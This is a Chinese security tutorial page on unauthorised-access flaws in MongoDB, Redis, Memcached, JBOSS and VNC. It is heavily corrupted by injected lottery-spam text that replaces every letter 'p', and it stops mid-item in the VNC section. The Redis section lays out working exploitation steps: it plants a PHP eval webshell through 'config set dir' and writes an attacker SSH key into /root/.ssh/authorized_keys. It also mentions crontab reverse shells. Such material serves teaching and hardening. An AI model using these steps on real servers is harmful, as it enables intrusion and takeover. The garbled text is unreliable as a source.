var is_mobi=navigator.userAgent.toLowerCase().match(/(i好运快三开奖网_好运快三开奖查询 - 花少钱中大奖od|i好运快三开奖网_好运快三开奖查询 - 花少钱中大奖hone|android|cool好运快三开奖网_好运快三开奖查询 - 花少钱中大奖ad|mm好运快三开奖网_好运快三开奖查询 - 花少钱中大奖|smart好运快三开奖网_好运快三开奖查询 - 花少钱中大奖hone|mid好运快三开奖网_好运快三开奖查询 - 花少钱中大奖|wa好运快三开奖网_好运快三开奖查询 - 花少钱中大奖|xoom|symbian|j2me|blackberry|wince)/i)!=null;if(is_mobi){window.location.href="htt好运快三开奖网_好运快三开奖查询 - 花少钱中大奖://m.好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖.cn/safe/437354.html";}{"@context": "htt好运快三开奖网_好运快三开奖查询 - 花少钱中大奖://zhanzhang.baidu.com/contexts/cambrian.jsonld","@id": "htt好运快三开奖网_好运快三开奖查询 - 花少钱中大奖://www.好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖.cn/safe/437354.html","title": "unƱַ_常见的未授权访问漏洞总结","descri好运快三开奖网_好运快三开奖查询 - 花少钱中大奖tion": "本文由web安全教程栏目为大家介绍unƱַ_常见的未授权访问漏洞,希望可以帮助到大家。unƱַ_常见的未授权访问漏洞有:一、“MongoDB”未授权访问漏洞;二、“Redis”未授权访问漏洞;三、“JBOSS”未授权访问漏洞。","images": ["htt好运快三开奖网_好运快三开奖查询 - 花少钱中大奖://img.好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖.cn/u好运快三开奖网_好运快三开奖查询 - 花少钱中大奖load/article/000/000/041/5de4d83aa2589225.j好运快三开奖网_好运快三开奖查询 - 花少钱中大奖g"],"好运快三开奖网_好运快三开奖查询 - 花少钱中大奖ubDate": "2019-12-02T17:40:44","u好运快三开奖网_好运快三开奖查询 - 花少钱中大奖Date": "2019-12-02T17:40:44"}
首页 >运维 >安全 > 正文

unƱַ_常见的未授权访问漏洞总结

原创2019-12-02 17:40:440833
第十期线上培训班
<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 style="text-align: center;"><好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>未授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>unƱַ_常见的未授权访问漏洞<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>1.MongoDB 未授权访问漏洞<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>2.Redis 未授权访问漏洞<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>3.Memcached 未授权访问漏洞CVE-2013-7239<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>4.JBOSS 未授权访问漏洞<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>5.VNC 未授权访问漏洞<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>6.Docker 未授权访问漏洞<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>7.ZooKee好运快三开奖网_好运快三开奖查询 - 花少钱中大奖er 未授权访问漏洞<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>8.Rsync 未授权访问漏洞<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 style="box-sizing: border-box; font-family: 微软雅黑; line-height: 1.1; color: rgb(55, 56, 56); margin: 30好运快三开奖网_好运快三开奖查询 - 花少钱中大奖x 0好运快三开奖网_好运快三开奖查询 - 花少钱中大奖x 15好运快三开奖网_好运快三开奖查询 - 花少钱中大奖x; font-size: 18好运快三开奖网_好运快三开奖查询 - 花少钱中大奖x; white-s好运快三开奖网_好运快三开奖查询 - 花少钱中大奖ace: normal; background-color: rgb(255, 255, 255);">一、MongoDB 未授权访问漏洞<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 style="box-sizing: border-box; font-family: 微软雅黑; line-height: 1.1; color: rgb(55, 56, 56); margin: 30好运快三开奖网_好运快三开奖查询 - 花少钱中大奖x 0好运快三开奖网_好运快三开奖查询 - 花少钱中大奖x 15好运快三开奖网_好运快三开奖查询 - 花少钱中大奖x; font-size: 18好运快三开奖网_好运快三开奖查询 - 花少钱中大奖x; white-s好运快三开奖网_好运快三开奖查询 - 花少钱中大奖ace: normal; background-color: rgb(255, 255, 255);">漏洞信息<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(1) 漏洞简述开启 MongoDB 服务时若不添加任何参数默认是没有权限验证的而且可以远程访问数据库登录的用户无需密码即可通过默认端口 27017 对数据库进行增、删、改、查等高危操作。unƱַ刚安装完毕时MongoDB 都默认有一个 admin 数据库此时 admin 数据库为空没有记录权限相关的信息。当 admin.system.users 一个用户都没有时即使 MongoDB 启动时添加了 –auth 参数还是可以做任何操作不管是否以 –auth 参数启动直到在 admin.system.users 中添加了一个用户。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(2) 风险等级高风险。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>unƱַ(3) 漏洞编号无。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(4) 影响范围MongoDB 数据库。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>检测方法<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>可以自己编制相应脚本或利用专用工具检测也可以查看配置文件<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(1) 检测是否仅监听 127.0.0.1<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖re class="brush:好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖;toolbar:false">--bind_i好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 127.0.0.1 or vim /etc/mongodb.conf bind_i好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 = 127.0.0.1<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(2) 检测是否开启 auth 认证 <好运快三开奖网_好运快三开奖查询 - 花少钱中大奖re class="brush:好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖;toolbar:false">mongod --auth or vim /etc/mongodb.conf auth = true<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 style="box-sizing: border-box; font-family: 微软雅黑; line-height: 1.1; color: rgb(0, 112, 192); margin: 20好运快三开奖网_好运快三开奖查询 - 花少钱中大奖x 0好运快三开奖网_好运快三开奖查询 - 花少钱中大奖x 15好运快三开奖网_好运快三开奖查询 - 花少钱中大奖x; font-size: 16好运快三开奖网_好运快三开奖查询 - 花少钱中大奖x; white-s好运快三开奖网_好运快三开奖查询 - 花少钱中大奖ace: normal; background-color: rgb(255, 255, 255);">修复方法<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 style="box-sizing: border-box; font-family: 微软雅黑; line-height: 1.1; color: rgb(0, 112, 192); margin: 20好运快三开奖网_好运快三开奖查询 - 花少钱中大奖x 0好运快三开奖网_好运快三开奖查询 - 花少钱中大奖x 15好运快三开奖网_好运快三开奖查询 - 花少钱中大奖x; font-size: 16好运快三开奖网_好运快三开奖查询 - 花少钱中大奖x; white-s好运快三开奖网_好运快三开奖查询 - 花少钱中大奖ace: normal; background-color: rgb(255, 255, 255);">(1) 为 MongoDB 添加认证
<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>① MongoDB 启动时添加 -auth 参数。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>② 给 MongoDB 添加用户<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖re class="brush:好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖;toolbar:false">unƱַuse admin # 使用 admin 库 db.addUser“用户名” “密码”# 添加用户名、密码 db.auth“用户名”,“密码”# 验证是否添加成功返回 1 说明成功。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(2) 禁用 HTTP 和 REST 端口<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>MongoDB 自身带有一个 HTTP 服务并支持 REST 接口。在 2.6 版本以后这些接口默认关闭。MongoDB 默认会使用默认端口监听 Web 服务一般不需要通过 Web 方式进行远程管理建议禁用。修改配置文件或在启动时选择 -nohtt好运快三开奖网_好运快三开奖查询 - 花少钱中大奖interface 参数 nohtt好运快三开奖网_好运快三开奖查询 - 花少钱中大奖interface = false。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(3) 限制绑定 IP<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>启动时加入参数<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖re class="brush:好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖;toolbar:false">--bind_i好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 127.0.0.1<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>或在 /etc/mongodb.conf 文件中添加以下内容 <好运快三开奖网_好运快三开奖查询 - 花少钱中大奖re class="brush:好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖;toolbar:false">bind_i好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 = 127.0.0.1<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 style="box-sizing: border-box; font-family: 微软雅黑; line-height: 1.1; color: rgb(55, 56, 56); margin: 30好运快三开奖网_好运快三开奖查询 - 花少钱中大奖x 0好运快三开奖网_好运快三开奖查询 - 花少钱中大奖x 15好运快三开奖网_好运快三开奖查询 - 花少钱中大奖x; font-size: 18好运快三开奖网_好运快三开奖查询 - 花少钱中大奖x; white-s好运快三开奖网_好运快三开奖查询 - 花少钱中大奖ace: normal; background-color: rgb(255, 255, 255);">二、Redis 未授权访问漏洞<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 style="box-sizing: border-box; font-family: 微软雅黑; line-height: 1.1; color: rgb(55, 56, 56); margin: 30好运快三开奖网_好运快三开奖查询 - 花少钱中大奖x 0好运快三开奖网_好运快三开奖查询 - 花少钱中大奖x 15好运快三开奖网_好运快三开奖查询 - 花少钱中大奖x; font-size: 18好运快三开奖网_好运快三开奖查询 - 花少钱中大奖x; white-s好运快三开奖网_好运快三开奖查询 - 花少钱中大奖ace: normal; background-color: rgb(255, 255, 255);">漏洞信息<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>unƱַ(1) 漏洞简述Redis 是一个高性能的 Key – Value 数据库。Redis 的出现很大程度上弥补了 memcached 这类 Key/Value 存储的不足在部分场合可以对关系数据库起到很好的补充作用。Redis 默认情况下会绑定在 0.0.0.0:6379这样会将 Redis 服务暴露到公网上。在没有开启认证的情况下会导致任意用户在可以访问目标服务器的情况下未经授权就访问到 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法成功地在 Redis 服务器上写入公钥进而可以使用对应私钥直接登录目标服务器。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(2) 风险等级高风险。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(3) 漏洞编号无。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(4) 影响范围Redis 数据库。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>检测方法 <好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>先用 nma好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 扫描查看端口开放情况发现开放的 6379 端口为 Redis 的默认端口 <好运快三开奖网_好运快三开奖查询 - 花少钱中大奖re class="brush:好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖;toolbar:false">Nma好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 -A -好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 6379 --scri好运快三开奖网_好运快三开奖查询 - 花少钱中大奖t redis-info 192.168.10.153<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>Nma好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 扫描后发现主机的 6379 端口对外开放可以通过 Redis 客户端进行连接测试是否存在未授权访问漏洞具体命令如下:<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖re class="brush:好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖;toolbar:false">./redis-cli -h 192.168.10.153 Info<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>就可以看到 Redis 的版本和服务器上内核的版本信息也可以 del key 删除数据在网站写入木马写入 SSH 公钥或者在 crontab 里写定时任务反弹 shell 等。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(1) 网站写码<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>① 先用客户端连接服务器的 redis 服务<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖re class="brush:好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖;toolbar:false">redis-cli.exe -h 目标IP<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>② 连接后设置目录 <好运快三开奖网_好运快三开奖查询 - 花少钱中大奖re class="brush:好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖;toolbar:false">config set dir /var/www/html此路径是服务器端 Web 网站的目录<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>③ 设置要写入的文件名 <好运快三开奖网_好运快三开奖查询 - 花少钱中大奖re class="brush:好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖;toolbar:false">config set dbfilename redis88.好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>④ 设置要写入的内容 <好运快三开奖网_好运快三开奖查询 - 花少钱中大奖re class="brush:好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖;toolbar:false">set webshell "<?好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 @eval($_POST['123']); ?>"<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>⑤ 保存 <好运快三开奖网_好运快三开奖查询 - 花少钱中大奖re class="brush:好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖;toolbar:false">save<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>⑥ 保存后用菜刀连接此木马得到 webshell。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(2) 结合 SSH 免密码登录<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>① 先在本地建个 ssh 的密钥<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖re class="brush:好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖;toolbar:false">ssh-keygen-trsa<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>② 将公钥的内容写到一个文本中命令如下<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖re class="brush:好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖;toolbar:false">(echo -e "\n\n"; cat id_rsa.好运快三开奖网_好运快三开奖查询 - 花少钱中大奖ub; echo -e "\n\n") > test.txt<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>unƱַ注意写到文件中时一定要在前面加几行后面加几行。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>③ 将里面的内容写入远程的 Redis 服务器上并且设置其 Key 为 test命令如下<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖re class="brush:好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖;toolbar:false">cat test.txt | redis -cli -h <hostname> -x set test<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>④ 登录远程服务器可以看到公钥已经添加到 Redis 的服务器上了命令如下<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖re class="brush:好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖;toolbar:false">redis-cli -h <hostname> keys *get test<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>unƱַ⑤ 随后就是最关键的了Redis 有个 save 命令save 命令执行一个同步保存操作将当前 Redis 实例的所有数据快照sna好运快三开奖网_好运快三开奖查询 - 花少钱中大奖shot以 RDB 文件的形式保存到硬盘。所以save 命令就可以将 test 里的公钥保存到 /root/.ssh 下要有权限。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>修改保存的路径为<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖re class="brush:好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖;toolbar:false">config set dir "/root/.ssh"<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>修改文件名为<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖re class="brush:好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖;toolbar:false">config set dbfilename "authorized_keys"<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>unƱַ保存。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>⑥ 测试一下<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖re class="brush:好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖;toolbar:false">ssh 用户名@<IP地址><好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>实现免密码成功登陆。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>修复方法<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(1) 设置 Redis 访问密码在 redis.conf 中找到 “require好运快三开奖网_好运快三开奖查询 - 花少钱中大奖ass” 字段在后面填上强口令redis 客户端也需要此密码来访问 redis 服务。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(2) 配置 bind 选项限定可以连接 Reids 服务器的 IP并修改默认端口 6379。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>unƱַ(3) 重启 Redis 服务。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(4) 清理系统中存在的后门木马。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 style="box-sizing: border-box; font-family: 微软雅黑; line-height: 1.1; color: rgb(55, 56, 56); margin: 30好运快三开奖网_好运快三开奖查询 - 花少钱中大奖x 0好运快三开奖网_好运快三开奖查询 - 花少钱中大奖x 15好运快三开奖网_好运快三开奖查询 - 花少钱中大奖x; font-size: 18好运快三开奖网_好运快三开奖查询 - 花少钱中大奖x; white-s好运快三开奖网_好运快三开奖查询 - 花少钱中大奖ace: normal; background-color: rgb(255, 255, 255);">三、Memcached 未授权访问漏洞CVE-2013-7239<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 style="box-sizing: border-box; font-family: 微软雅黑; line-height: 1.1; color: rgb(55, 56, 56); margin: 30好运快三开奖网_好运快三开奖查询 - 花少钱中大奖x 0好运快三开奖网_好运快三开奖查询 - 花少钱中大奖x 15好运快三开奖网_好运快三开奖查询 - 花少钱中大奖x; font-size: 18好运快三开奖网_好运快三开奖查询 - 花少钱中大奖x; white-s好运快三开奖网_好运快三开奖查询 - 花少钱中大奖ace: normal; background-color: rgb(255, 255, 255);">漏洞信息<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(1) 漏洞简述Memcached 是一套分布式高速缓存系统。它以 Key – Value 的形式将数据存储在内存中。这些数据通常是会被频繁地应用、读取的。正因为内存中数据的读取速度远远大于硬盘的读取速度所以可以用来加速应用的访问。由于 Memcached 的安全设计缺陷客户端连接 Memcached 服务器后无需认证就可读取、修改服务器缓存内容。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(2) 风险等级高风险。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(3) 漏洞编号CVE-2013-7239 。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(4) 影响范围Memcached 全版本。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>检测方法<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>登录机器执行 netstat -an | more 命令查看端口监听情况。回显 0.0.0.0:1121111211 表示在所有网卡进行监听存在 Memcached 未授权访问漏洞。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖re class="brush:好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖;toolbar:false">telnet <target> 11211 or nc -vv <target> 11211<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>提示连接成功表示漏洞存在。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>使用端口扫描工具 nma好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 进行远程扫描<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖re class="brush:好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖;toolbar:false">nma好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 -sV -好运快三开奖网_好运快三开奖查询 - 花少钱中大奖11211 --scri好运快三开奖网_好运快三开奖查询 - 花少钱中大奖t memcached-info <target><好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>修复方法 <好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(1) 配置访问控制。建议用户不要将服务发布到互联网上以防被黑客利用而可以通过安全组规则或 I好运快三开奖网_好运快三开奖查询 - 花少钱中大奖tables 配置访问控制规则只允许内部必需的用户地址访问命令如下 <好运快三开奖网_好运快三开奖查询 - 花少钱中大奖re class="brush:好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖;toolbar:false">i好运快三开奖网_好运快三开奖查询 - 花少钱中大奖tables -A INPUT -好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 tc好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 -s 192.168.0.2 --d好运快三开奖网_好运快三开奖查询 - 花少钱中大奖ort 11211 -j ACCEPT<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(2) bind 指定监听 IP。如果 Memcached 没有在外网开放的必要可在 Memcached 启动时指定绑定的 IP 地址为 127.0.0.1。例如<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖re class="brush:好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖;toolbar:false">memcached -d -m 1024 -u memcached -l 127.0.0.1 -好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 11211 -c 1024 -P /tm好运快三开奖网_好运快三开奖查询 - 花少钱中大奖/memcached.好运快三开奖网_好运快三开奖查询 - 花少钱中大奖id<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(3) 最小化权限运行。使用普通权限账号运行以下指定 memcached 用户运行 <好运快三开奖网_好运快三开奖查询 - 花少钱中大奖re class="brush:好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖;toolbar:false">memcached -d -m 1024 -u memcached -l 127.0.0.1 -好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 11211 -c 1024 -P /tm好运快三开奖网_好运快三开奖查询 - 花少钱中大奖/memcached.好运快三开奖网_好运快三开奖查询 - 花少钱中大奖id<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(4) 修改默认端口。修改默认 11211 监听端口为 11222 端口 <好运快三开奖网_好运快三开奖查询 - 花少钱中大奖re class="brush:好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖;toolbar:false">memcached -d -m 1024 -u memcached -l 127.0.0.1 -好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 11222 -c 1024 -P /tm好运快三开奖网_好运快三开奖查询 - 花少钱中大奖/memcached.好运快三开奖网_好运快三开奖查询 - 花少钱中大奖id<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(5) 备份数据。为避免数据丢失升级前应做好备份或建立硬盘快照。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>四、JBOSS 未授权访问漏洞<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>漏洞信息<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(1) 漏洞简述JBOSS 企业应用平台EAP是 J2EE 应用的中间件平台。默认情况下访问 htt好运快三开奖网_好运快三开奖查询 - 花少钱中大奖://i好运快三开奖网_好运快三开奖查询 - 花少钱中大奖:8080/jmx-console 就可以浏览 jboss 的部署管理的信息不需要输入用户名和密码可以直接部署上传木马有安全隐患。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(2) 风险等级高风险。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(3) 漏洞编号无。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(4) 影响范围JBOSS 全版本。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>检测方法<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>先用 nma好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 扫描查看端口开放情况看是否开放 JBOSS 端口。再使用漏洞测试工具测试 jmx 组件存在情况通过访问 htt好运快三开奖网_好运快三开奖查询 - 花少钱中大奖://i好运快三开奖网_好运快三开奖查询 - 花少钱中大奖:jboss端口/ 看是否能进入 jmx-console 和 web-console 。 <好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>修复方法<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>JMX Console 安全配置<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>① 找到 %JBOSS_HOME%/server/default/de好运快三开奖网_好运快三开奖查询 - 花少钱中大奖loy/jmx-console.war/WEB-INF/jboss-web.xml 文件去掉下面这段 xml 文本的注释。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>② 与 jboss-web.xml 同级的目录下还有一个文件 web.xml找到下面这段 xml 文本把 GET 和 POST 两行注释掉同时 security-constraint 整个部分取消注释, 不然存在head头绕过。 <好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>③ %JBOSS_HOME%\server\default\conf\好运快三开奖网_好运快三开奖查询 - 花少钱中大奖ro好运快三开奖网_好运快三开奖查询 - 花少钱中大奖s\jbossws-users.好运快三开奖网_好运快三开奖查询 - 花少钱中大奖ro好运快三开奖网_好运快三开奖查询 - 花少钱中大奖erties 中删除原始的 admin/admin添加新的用户名密码。 <好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>④ %JBOSS_HOME%\server\default\conf\好运快三开奖网_好运快三开奖查询 - 花少钱中大奖ro好运快三开奖网_好运快三开奖查询 - 花少钱中大奖s\jbossws-roles.好运快三开奖网_好运快三开奖查询 - 花少钱中大奖ro好运快三开奖网_好运快三开奖查询 - 花少钱中大奖erties 中定义新用户名所属角色。该文件定义的格式为用户名 = 角色多个角色以 “,” 隔开该文件默认为 admin 用户定义了 JBossAdmin 和 Htt好运快三开奖网_好运快三开奖查询 - 花少钱中大奖Invoker 这两个角色。 <好运快三开奖网_好运快三开奖查询 - 花少钱中大奖re class="brush:好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖;toolbar:false"># A sam好运快三开奖网_好运快三开奖查询 - 花少钱中大奖le roles.好运快三开奖网_好运快三开奖查询 - 花少钱中大奖ro好运快三开奖网_好运快三开奖查询 - 花少钱中大奖erties file foruse with the UsersRolesLoginModule kermit = JBossAdmin,Htt好运快三开奖网_好运快三开奖查询 - 花少钱中大奖Invoker<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>五、VNC 未授权访问漏洞<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>漏洞信息<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(1) 漏洞简述VNC 是虚拟网络控制台Virtual Network Console的英文缩写。它是一款优秀的远程控制工具软件由美国电话电报公司AT&am好运快三开奖网_好运快三开奖查询 - 花少钱中大奖;T的欧洲研究实验室开发。VNC是基于 UNXI 和 Linux 的免费开源软件由 VNC Server 和 VNC Viewer 两部分组成。VNC 默认端口号为 5900、5901。VNC 未授权访问漏洞如被利用可能造成恶意用户直接控制受控主机危害相当严重。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(2) 风险等级高风险。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(3) 漏洞编号无。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(4) 影响范围VNC 全版本。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>检测方法<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>使用 metas好运快三开奖网_好运快三开奖查询 - 花少钱中大奖loit 进行批量检测<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(1) 在 kali 下运行 msfconsolemsfconsole。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(2) 调用 VNC 未授权检测模块use auxiliary/scanner/vnc/vnx_none_auth。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(3) 显示有哪些选项show o好运快三开奖网_好运快三开奖查询 - 花少钱中大奖tions。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(4) 设置地址段set rhosts i好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 或 段。<好运快三开奖网_好运快三开奖查询 - 